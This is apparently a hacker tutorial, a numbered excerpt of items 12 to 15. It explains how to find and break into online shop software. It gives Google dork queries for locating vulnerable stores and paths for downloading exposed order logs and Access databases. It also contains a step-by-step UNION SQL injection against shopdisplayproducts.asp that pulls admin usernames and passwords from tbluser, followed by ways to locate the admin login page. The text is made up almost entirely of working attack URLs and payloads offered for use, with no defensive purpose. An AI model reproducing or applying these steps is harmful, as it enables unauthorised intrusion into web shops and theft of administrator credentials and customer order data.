12: google.com:--> allinurl:/commercesql/
target looks like :--> www.xxxxx.com/commercesql/xxxxx
exploit :--> cgi-bin/commercesql/index.cgi?page=
target whit exploit admin config :--> http://www.xxxxxx.co..../admin_conf.pl
target whit exploit admin manager :--> http://www.xxxxxx.co....in/manager.cgi
target whit exploit order.log :--> http://www.xxxxx.com....iles/order.log
13: google.com:--> allinurl:/eshop/
target looks like :--> www.xxxxx.com/xxxxx/eshop
exploit :-->/cg-bin/eshop/database/order.mdb
target whit exploit :--> http://www.xxxxxx.co....base/order.mdb
after dl the db look at access for user and password
14: 1/ search google: allinurl:"shopdisplayproducts.asp?id=
--->http://victim.com/shopdisplayproducts.asp?id=5
2/ find error by adding '
--->http://victim.com/shopdisplayproducts.asp?id=5'
--->error: Microsoft JET database engine error "80040e14"...../shop$db.asp, line467
-If you don't see error then change id to cat
--->http://victim.com/shopdisplayproducts.asp?cat=5'
3/ if this shop has error then add this: %20union%20select%201%20from%20tbluser"having%201= 1--sp_password
--->http://victim.com/shopdisplayproduct...on%20select%20 1%20from%20tbluser"having%201=1--sp_password
--->error: 5' union select 1 from tbluser "having 1=1--sp_password.... The number of column in the two selected tables or queries of a union queries do not match......
4/ add 2,3,4,5,6.......until you see a nice table
add 2
---->http://victim.com/shopdisplayproduct...on%20select%20 1,2%20from%20tbluser"having%201=1--sp_password
then 3
---->http://victim.com/shopdisplayproduct...on%20select%20 1,2,3%20from%20tbluser"having%201=1--sp_password
then 4 ---->http://victim.com/shopdisplayproduct...on%20select%20 1,2,3,4%20from%20tbluser"having%201=1--sp_password
...5,6,7,8,9.... untill you see a table. (exp:...47)
---->http://victim.com/shopdisplayproduct...on%20select%20 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,3 7,38,39,40,41,42,,43,44,45,46,47%20from%20tbluser" having%201=1--sp_password
---->see a table.
5/ When you see a table, change 4 to fldusername and 22 to fldpassword you will have the admin username and password
--->http://victim.com/shopdisplayproduct...on%20%20elect% 201,2,3,fldusername,5,6,7,8,9,10,11,12,13,14,15,16 ,17,18,19,20,21,fldpassword,23,24,25,26,27,28,29,3 0,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46, 47%20from%20tbluser%22having%201=1--sp_password
6/ Find link admin to login:
try this first: http://victim.com/shopadmin.asp
or: http://victim.com/shopadmin.asp
Didn't work? then u have to find yourself:
add: (for the above example) '%20union%20select%201,2,3,fieldvalue,5,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22, 23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 ,40,41,42,43,44,45,46,47%20from%20configuration"ha ving%201=1--sp_password
--->http://victim.com/shopdisplayproduct...n%20select%201 ,2,3,fieldvalue,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22, 23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 ,40,41,42,43,44,45,46,47%20from%20configuration"ha ving%201=1--sp_password
you'll see something like: ( lot of them)
shopaddmoretocart.asp
shopcheckout.asp
shopdisplaycategories.asp
..............
then guess admin link by adding the above data untill you find admin links
15:
xdatabasetypexEmailxEmailNamexEmailSubjectxEmailSy stemxEmailTypexOrdernumber.:. EXAMPLE .:.
the most important thing here is xDatabase
xDatabase: shopping140
ok now the URL will be like this:
****://***.victim.com/shop/shopping140.mdb
if you didn't download the Database..
Try this while there is dblocation.
xDblocation
resx
the url will be:
****://***.victim.com/shop/resx/shopping140.mdb
If u see the error message you have to try this :
****://***.victim.com/shop/shopping500.mdb
download the mdb file and you should be able to open it with any mdb file viewer, you should be able to find one at download.com
inside you should be able to find *** information.
and you should even be able to find the admin username and password for the website.
the admin login page is usually located here
****://***.victim.com/shop/shopadmin.asp
Selengkapnya disini